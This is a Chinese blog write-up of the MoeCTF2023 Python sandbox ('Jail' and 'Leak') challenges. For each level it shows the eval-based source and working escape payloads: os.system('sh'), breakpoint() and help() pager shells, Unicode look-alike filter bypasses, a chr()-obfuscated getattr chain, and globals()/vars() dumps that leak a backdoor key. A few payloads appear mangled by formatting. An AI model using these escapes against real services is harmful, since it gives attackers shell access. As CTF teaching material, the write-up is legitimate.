MoeCTF2023_Jail

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量162 收藏
点赞数
分类专栏: MoeCTF2023 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75094067/article/details/133807785
版权

文章目录

MoeCTF2023_Jail

Jail Level 0

Source Code

print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> __import__('os').system('sh')
ls
flag
server.py
cat flag
flag{7667mhPKkpUNu21zjvmy3RA9ZSJ3e5TM}

Jail Level 1

Source Code

print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>12:
  print("Oh hacker! Bye~")
  exit(0)
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> breakpoint()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')
ls
flag
server.py
cat flag
flag{hYmKR3P74S0BxEnC_V2tQvY9aH22SI8E}

Jail Level 2

Source Code

print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>6:
  print("Oh hacker! Bye~")
  exit(0)
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> help()

Welcome to Python 3.10's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the internet at https://docs.python.org/3.10/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help> os
WARNING: terminal is not fully functional
Press RETURN to continue !sh

!sh
sh: 0: can't access tty; job control turned off
$ cat flag
flag{ywztaDtshMFvz7sQxM-U2VdFWqsGkK1u}

Jail Level 3

Source Code

import re
BANLIST = ['breakpoint']
BANLIST_WORDS = '|'.join(f'({WORD})' for WORD in BANLIST)
print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>12:
print("Oh hacker! Bye~")
exit(0)
if re.findall(BANLIST_WORDS, user_input_data, re.I):
raise Exception('Blacklisted word detected! you are hacker!')
print('Answer result: {}'.format(eval(user_input_data)))

exp

字符编码绕过

s = 'breakpoint()'

for i in range(128, 65537):
    tmp = chr(i)
    try:
        res = tmp.encode('idna').decode('utf-8')
        if res in s and len(res) > 0:
            print(f"ascii:{i}  A:{res}  U:{tmp}  payload:{s.replace(res,tmp)}")
    except:
        pass
# ascii:170  A:a  U:ª  payload:breªkpoint()
# ascii:186  A:o  U:º  payload:breakpºint()
# ascii:691  A:r  U:ʳ  payload:bʳeakpoint()
# ascii:8305  A:i  U:ⁱ  payload:breakpoⁱnt()
# ascii:8317  A:(  U:⁽  payload:breakpoint⁽)
# ascii:8318  A:)  U:⁾  payload:breakpoint(⁾
# ascii:8319  A:n  U:ⁿ  payload:breakpoiⁿt()
# ascii:8333  A:(  U:₍  payload:breakpoint₍)
# ascii:8334  A:)  U:₎  payload:breakpoint(₎
# ascii:8464  A:i  U:ℐ  payload:breakpoℐnt()
# ascii:8465  A:i  U:ℑ  payload:breakpoℑnt()
# ascii:8469  A:n  U:ℕ  payload:breakpoiℕt()
# ascii:8473  A:p  U:ℙ  payload:breakℙoint()
# ascii:8475  A:r  U:ℛ  payload:bℛeakpoint()
# ascii:8476  A:r  U:ℜ  payload:bℜeakpoint()
# ascii:8477  A:r  U:ℝ  payload:bℝeakpoint()
# ascii:8490  A:k  U:K  payload:breaKpoint()
# ascii:8492  A:b  U:ℬ  payload:ℬreakpoint()
# ascii:8495  A:e  U:ℯ  payload:brℯakpoint()
# ascii:8496  A:e  U:ℰ  payload:brℰakpoint()
# ascii:8500  A:o  U:ℴ  payload:breakpℴint()
# ascii:8505  A:i  U:ℹ  payload:breakpoℹnt()
# ascii:8519  A:e  U:ⅇ  payload:brⅇakpoint()
# ascii:8520  A:i  U:ⅈ  payload:breakpoⅈnt()
# ascii:8544  A:i  U:Ⅰ  payload:breakpoⅠnt()
# ascii:8560  A:i  U:ⅰ  payload:breakpoⅰnt()
# ascii:9398  A:a  U:Ⓐ  payload:breⒶkpoint()
# ascii:9399  A:b  U:Ⓑ  payload:Ⓑreakpoint()
# ascii:9402  A:e  U:Ⓔ  payload:brⒺakpoint()
# ascii:9406  A:i  U:Ⓘ  payload:breakpoⒾnt()
# ascii:9408  A:k  U:Ⓚ  payload:breaⓀpoint()
# ascii:9411  A:n  U:Ⓝ  payload:breakpoiⓃt()
# ascii:9412  A:o  U:Ⓞ  payload:breakpⓄint()
# ascii:9413  A:p  U:Ⓟ  payload:breakⓅoint()
# ascii:9415  A:r  U:Ⓡ  payload:bⓇeakpoint()
# ascii:9417  A:t  U:Ⓣ  payload:breakpoinⓉ()
# ascii:9424  A:a  U:ⓐ  payload:breⓐkpoint()
# ascii:9425  A:b  U:ⓑ  payload:ⓑreakpoint()
# ascii:9428  A:e  U:ⓔ  payload:brⓔakpoint()
# ascii:9432  A:i  U:ⓘ  payload:breakpoⓘnt()
# ascii:9434  A:k  U:ⓚ  payload:breaⓚpoint()
# ascii:9437  A:n  U:ⓝ  payload:breakpoiⓝt()
# ascii:9438  A:o  U:ⓞ  payload:breakpⓞint()
# ascii:9439  A:p  U:ⓟ  payload:breakⓟoint()
# ascii:9441  A:r  U:ⓡ  payload:bⓡeakpoint()
# ascii:9443  A:t  U:ⓣ  payload:breakpoinⓣ()
# ascii:13260  A:in  U:㏌  payload:breakpo㏌t()
# ascii:65077  A:(  U:︵  payload:breakpoint︵)
# ascii:65078  A:)  U:︶  payload:breakpoint(︶
# ascii:65113  A:(  U:﹙  payload:breakpoint﹙)
# ascii:65114  A:)  U:﹚  payload:breakpoint(﹚
# ascii:65288  A:(  U:(  payload:breakpoint()
# ascii:65289  A:)  U:)  payload:breakpoint()
# ascii:65313  A:a  U:A  payload:breAkpoint()
# ascii:65314  A:b  U:B  payload:Breakpoint()
# ascii:65317  A:e  U:E  payload:brEakpoint()
# ascii:65321  A:i  U:I  payload:breakpoInt()
# ascii:65323  A:k  U:K  payload:breaKpoint()
# ascii:65326  A:n  U:N  payload:breakpoiNt()
# ascii:65327  A:o  U:O  payload:breakpOint()
# ascii:65328  A:p  U:P  payload:breakPoint()
# ascii:65330  A:r  U:R  payload:bReakpoint()
# ascii:65332  A:t  U:T  payload:breakpoinT()
# ascii:65345  A:a  U:a  payload:breakpoint()
# ascii:65346  A:b  U:b  payload:breakpoint()
# ascii:65349  A:e  U:e  payload:breakpoint()
# ascii:65353  A:i  U:i  payload:breakpoint()
# ascii:65355  A:k  U:k  payload:breakpoint()
# ascii:65358  A:n  U:n  payload:breakpoint()
# ascii:65359  A:o  U:o  payload:breakpoint()
# ascii:65360  A:p  U:p  payload:breakpoint()
# ascii:65362  A:r  U:r  payload:breakpoint()
# ascii:65364  A:t  U:t  payload:breakpoint()

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> breakpoint()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')
cat flag
flag{Vg03aw9uswciSrMEbSuhsW7hyef89_k2}

Jail Level 4

Welcome to the MoeCTF2023 Jail challenge.This is a repeater and it repeats what you say!
python verison:2.7
> __import__('os').system('sh')
sh: 0: can't access tty; job control turned off
$ cat flag
flag{cAWccu_EE6gKWg1XWHB7uDTQY70IJWv2}

Jail Level 5

Source Code

print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
def func_filter(s):
  not_allowed = set('"'`bid')
  return any(c in not_allowed for c in s)
user_input_data = input("> ")
if func_filter(user_input_data):
  print("Oh hacker! Bye~")
  exit(0)
if not user_input_data.isascii():
  print("Sorry we only ascii for this chall!")
  exit(0)
print('Answer result: {}'.format(eval(user_input_data)))

exp

构造:().class.base.subclasses()[-4].init.globals’system’

利用getattr(),chr()绕过:getattr(getattr(getattr(getattr(().class, chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)), chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()[-4], chr(95)+chr(95)+chr(105)+chr(110)+chr(105)+chr(116)+chr(95)+chr(95)), chr(95)+chr(95)+chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115)+chr(95)+chr(95))chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> getattr(getattr(getattr(getattr(().__class__, chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)), chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()[-4], chr(95)+chr(95)+chr(105)+chr(110)+chr(105)+chr(116)+chr(95)+chr(95)), chr(95)+chr(95)+chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115)+chr(95)+chr(95))[chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)](chr(115)+chr(104))
ls
flag_9af31874439b2aad
server.py
cat flag_9af31874439b2aad
moectf{GsFYUbxaK8VNeW6ohhIn1N42EnqKv7PQ}

Leak Level 0

Source Code

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
print("| Options:
|       [V]uln
|       [B]ackdoor")
def func_filter(s):
  not_allowed = set('vvvveeee')
  return any(c in not_allowed for c in s)
while(1):
  challenge_choice = input(">>> ").lower().strip()
  if challenge_choice == 'v':
    code = input("code >> ")
    if(len(code)>9):
      print("you're hacker!")
      exit(0)
    if func_filter(code):
      print("Oh hacker! byte~")
      exit(0)
    print(eval(code))
  elif challenge_choice == 'b':
    print("Please enter the admin key")
    key = input("key >> ")
    if(key == fake_key_into_local_but_valid_key_into_remote):
      print("Hey Admin,please input your code:")
      code = input("backdoor >> ")
      print(eval(code))
  else:
    print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> globals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fc2f593cac0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/ctf/./server.py', '__cached__': None, 'key_6366a131649a4e9b': '4e86eda06366a131649a4e9be1a9f217', 'WELCOME': "\n  __  __  ___       _      ______        _  __  _                _  ___  \n |  \\/  |/ _ \\     | |    |  ____| ____ | |/ / | |              | |/ _ \\ \n | \\  / | | | | ___| |    | |__   / __ \\| ' /  | | _____   _____| | | | |\n | |\\/| | | | |/ _ \\ |    |  __| / / _` |  <   | |/ _ \\ \\ / / _ \\ | | | |\n | |  | | |_| |  __/ |____| |___| | (_| | . \\  | |  __/\\ V /  __/ | |_| |\n |_|  |_|\\___/ \\___|______|______\\ \\__,_|_|\\_\\ |_|\\___| \\_/ \\___|_|\\___/ \n                                  \\____/                                 \n
                                                             \n", 'CHALLENGE_SOURCE_CODE': '\n    fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"\n    print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")\n    print("| Options: \n|\t[V]uln \n|\t[B]ackdoor")\n    def func_filter(s):\n      not_allowed = set(\'vvvveeee\')\n      return any(c in not_allowed for c in s)\n    while(1):\n      challenge_choice = input(">>> ").lower().strip()\n      if challenge_choice == \'v\':\n        code = input("code >> ")\n        if(len(code)>9):\n          print("you\'re hacker!")\n          exit(0)\n        if func_filter(code):\n          print("Oh hacker! byte~")\n          exit(0)\n        print(eval(code))\n      elif challenge_choice == \'b\':\n        print("Please enter the admin key")\n        key = input("key >> ")\n        if(key == fake_key_into_local_but_valid_key_into_remote):\n          print("Hey Admin,please input your code:")\n          code = input("backdoor >> ")\n          print(eval(code))\n      else:\n        print("You should select valid choice!")\n', 'choice': 'e', 'func_filter': <function func_filter at 0x7fc2f599e0e0>, 'challenge_choice': 'v', 'code': 'globals()'}
>>> b
Please enter the admin key
key >> 4e86eda06366a131649a4e9be1a9f217
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{E1iKuuMPXcNIYBamRpTdbCqmMeEHp8ud}

Leak Level 1

Source Code

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
def func_filter(s):
  not_allowed = set('moe_dbt')
  return any(c in not_allowed for c in s)
print("| Options:
|       [V]uln
|       [B]ackdoor")
while(1):
  challenge_choice = input(">>> ").lower().strip()
  if challenge_choice == 'v':
    code = input("code >> ")
    if(len(code)>6):
      print("you're hacker!")
      exit(0)
    if func_filter(code):
      print("Oh hacker! byte~")
      exit(0)
    print(eval(code))
  elif challenge_choice == 'b':
    print("Please enter the admin key")
    key = input("key >> ")
    if(key == fake_key_into_local_but_vailed_key_into_remote):
      print("Hey Admin,please input your code:")
      code = input("backdoor >> ")
      print(eval(code))
  else:
    print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> vars()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7feb7a85cac0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/ctf/./server.py', '__cached__': None, 'key_ff8457ee50ed8d0f': '8d3d451fff8457ee50ed8d0f24881eac', 'WELCOME': "\n  __  __  ___       _      ______        _  __  _                _ __ \n |  \\/  |/ _ \\     | |    |  ____| ____ | |/ / | |              | /_ |\n | \\  / | | | | ___| |    | |__   / __ \\| ' /  | | _____   _____| || |\n | |\\/| | | | |/ _ \\ |    |  __| / / _` |  <   | |/ _ \\ \\ / / _ \\ || |\n | |  | | |_| |  __/ |____| |___| | (_| | . \\  | |  __/\\ V /  __/ || |\n |_|  |_|\\___/ \\___|______|______\\ \\__,_|_|\\_\\ |_|\\___| \\_/ \\___|_||_|\n                                  \\____/
            \n
                                       \n", 'CHALLENGE_SOURCE_CODE': '\n    fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"\n    print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")\n    def func_filter(s):\n      not_allowed = set(\'moe_dbt\')\n      return any(c in not_allowed for c in s)\n    print("| Options: \n|\t[V]uln \n|\t[B]ackdoor")\n    while(1):\n      challenge_choice = input(">>> ").lower().strip()\n      if challenge_choice == \'v\':\n        code = input("code >> ")\n        if(len(code)>6):\n          print("you\'re hacker!")\n          exit(0)\n        if func_filter(code):\n          print("Oh hacker! byte~")\n          exit(0)\n        print(eval(code))\n      elif challenge_choice == \'b\':\n        print("Please enter the admin key")\n        key = input("key >> ")\n        if(key == fake_key_into_local_but_vailed_key_into_remote):\n          print("Hey Admin,please input your code:")\n          code = input("backdoor >> ")\n          print(eval(code))\n      else:\n        print("You should select valid choice!")\n', 'choice': 'e', 'func_filter': <function func_filter at 0x7feb7a8be0e0>, 'challenge_choice': 'v', 'code': 'vars()'}
>>> b
Please enter the admin key
key >> 8d3d451fff8457ee50ed8d0f24881eac
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{tg2GYrhoUnsx6A_Na6qXnk3I4s0cibWH}

Leak Level 2

Source Code

  fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
    print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
    print("| Options:
|       [V]uln
|       [B]ackdoor")
    def func_filter(s):
      not_allowed = set('dbtaaaaaaaaa!')
      return any(c in not_allowed for c in s)
    while(1):
      challenge_choice = input(">>> ").lower().strip()
      if challenge_choice == 'v':
        print("you need to ")
        code = input("code >> ")
        if(len(code)>6):
          print("you're hacker!")
          exit(0)
        if func_filter(code):
          print("Oh hacker! byte~")
          exit(0)
        if not code.isascii():
          print("please use ascii only thanks!")
          exit(0)
        print(eval(code))
      elif challenge_choice == 'b':
        print("Please enter the admin key")
        key = input("key >> ")
        if(key == fake_key_into_local_but_vailed_key_into_remote):
          print("Hey Admin,please input your code:")
          code = input("backdoor> ")
          print(eval(code))
      else:
        print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> help()

Welcome to Python 3.10's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the internet at https://docs.python.org/3.10/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help> __main__
Help on module __main__:

NAME
    __main__

FUNCTIONS
    func_filter(s)

DATA
    CHALLENGE_SOURCE_CODE = '\n    fake_key_into_local_but_valid_key_into_...
    WELCOME = '\n  __  __  ___       _      ______        _  __ ...       ...
    __annotations__ = {}
    challenge_choice = 'v'
    choice = 'e'
    code = 'help()'
    key_f5ee1754b2e73acf = '43610e2ef5ee1754b2e73acf35348dd5'

FILE
    /home/ctf/server.py
>>> b
Please enter the admin key
key >> 43610e2ef5ee1754b2e73acf35348dd5
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{bDLQw0_0cwm9Ef63vWy3rIQiy2xpM5uh}
m0_75094067
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
simple_jail.conf
02-19
配置失败的简单配置 Le nombre d'essaie est de 2 Le d ban estdéfinissur -1 doncàvie N'oublier pas de rajouter votre IP dans lacatégorie“忽略IP”
esx_jail:让警察关押人,一个FiveM项目
05-23
esx_jail 让警察把人们关进监狱!特征监狱里的人! 将监狱信息保存到数据库,又名反战保持监狱时间更新安装克隆项目并将其添加到您的resorces目录将项目添加到您的server.cfg 在您的数据库中导入esx_jail.sql 在...
【西电Moectf2023-Jail-WP】
qq_33295410的博客
09-27 2618
它支持在源码行间设置(有条件的)断点和单步执行,检视堆栈帧,列出源码列表,以及在任何堆栈帧的上下文中运行任意 Python 代码。当各位玩家连接后 可以看到一个类似于菜单的东西.输入g(G)会获得挑战的源码,输入e(E)会进入挑战,输入c(C)会得到挑战的描述[题目里的会更加详细],输入q(Q)会退出。设置了两个功能,一个是漏洞利用,可以使用python下面函数查看环境变量,找到真正的key,再利用backdoor来getshell。手动在终端输入是不行的,需要使用脚本提交,贴上代码。
moectf2023学习笔记
Fab1an的博客
08-15 1007
也可以在这里改cookie的值。
MoeCTF 2023 Web+Jail wp
Jay17的博客
10-18 1594
MoeCTF 2023 Web+Jail wp
BugKu_python_jail
Kobalos的博客
08-24 736
看到提示了nc 114.67.246.176 13828 在终端连接nc 这时候看到了描述中的提示,flag在flag变量里面! 尝试打印flag变量 发现他报错了,再尝试下任意打印一个字符串试一下 任意输入的字符a被成功打印,猜测应该是对输入的长度进行限制 打印“aa”又报错了,猜测输入的字符长度应该被限制在10以内 这时候想到help函数,借助报错信息应该可以带出flag 成功得到flag! ...
bugku crypto-python_jail
weixin_46578840的博客
08-22 587
启动场景后得到nc ip+端口号 连上之后发现print flag会报错 而且经过测试只能传入10个字符多了就会报错 那就不能用print 利用python中help()函数,借报错信息带出flag变量值内容, 刚好10个字符
BugkuCTF-Crypto题python_jail
am_03的博客
08-27 821
题目可通过nc远程连接 输入nc建立连接 测试发现最多只能输入10个字符,要想有输出,需要print() (7个字符) 若print(flag)则有11个字符,超出限制,报错 可利用python里help()函数,借报错信息带出flag变量值内容,help(flag) 刚好10个字符 ...
【misc】[HNCTF 2022 Week1]calc_jail_beginner_level2.5(JAIL) --沙盒逃逸,breakpoint函数
question55的博客
11-09 104
_import__('os').system('sh')即可getshell。
一道简单的pwn题 Escape_From_Jail-50
qq_41071646的博客
01-21 877
这道题 真的 很难受  我都不知道怎么搞   也没有附件 我还以为是 题出问题了  然后我一个已经把这个题过的人 告诉我 这个没有问题   额  那就很凉凉啊    然后直接 链接看看 是哪里除了问题 后来 我甚至和一个搞web的朋友都想文件上传了    然后先连接 看看  #!/usr/bin/python #coding:utf-8 from pwn import* io=...
【misc】[HNCTF 2022 Week1]calc_jail_beginner_level2(JAIL) --沙盒逃逸,嵌套执行getshell
question55的博客
11-09 71
查看题目附件这个if语句直接限制了输入的字符串长度不能大于13,像__import__('os').system('sh')现在肯定用不了,但是可以输入eval(input())进行嵌套执行,这句代码的意思相当于input()继续输入字符串,再由eval函数解析执行,所有就没有了字符长度的限制,然后再输入__import__('os').system('sh')即可getshell
subliminal_freenas_jail:在潜意识监狱中作为 crontab 条目运行的潜意识脚本
06-22
subliminal_freenas_jail 在潜意识监狱中作为 crontab 条目运行的潜意识脚本制作了一个使用 crontab 和 bash 运行的脚本。 你必须先安装 bash cd /usr/ports/shells/bash/ && make install clean BATCH=yes crontab ...
互联网笔试题java-java_jail:chrootjavajail和JSONjava跟踪打印机
06-13
互联网笔试题java
jail
03-19
监狱
等保测评和安全运维
weixin_64392888的博客
06-11 654
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1411
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 429
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 966
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
UPDATE IEAI_APP_JAIL SET IEAI_APP_JAIL.IJAILFLAG = 1 FROM IEAI_APP_JAIL INNER JOIN TMP_NODE_WARNING ON IEAI_APP_JAIL.IPROJECTNAME = TMP_NODE_WARNING.PRJNAME;这sql哪里有问题
06-01
这个 SQL 语句的语法是不正确的。正确的语法应该是: ``` UPDATE IEAI_APP_JAIL SET IEAI_APP_JAIL.IJAILFLAG = 1 FROM IEAI_APP_JAIL INNER JOIN TMP_NODE_WARNING ON IEAI_APP_JAIL.IPROJECTNAME = TMP_NODE_WARNING.PRJNAME; ``` 在 SQL Server 中,`UPDATE` 语句的语法应该是: ``` UPDATE table_name SET column1 = value1, column2 = value2, ... FROM table1 INNER JOIN table2 ON table1.column = table2.column; ``` 在此语法中,`table_name` 是要更新的表的名称,`column1` 和 `column2` 是要更新的列的名称,`value1` 和 `value2` 是要更新的值,`table1` 和 `table2` 是要联接的表的名称,`column` 是要联接的列的名称。 因此,你的 SQL 语句应该按照上述语法进行修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值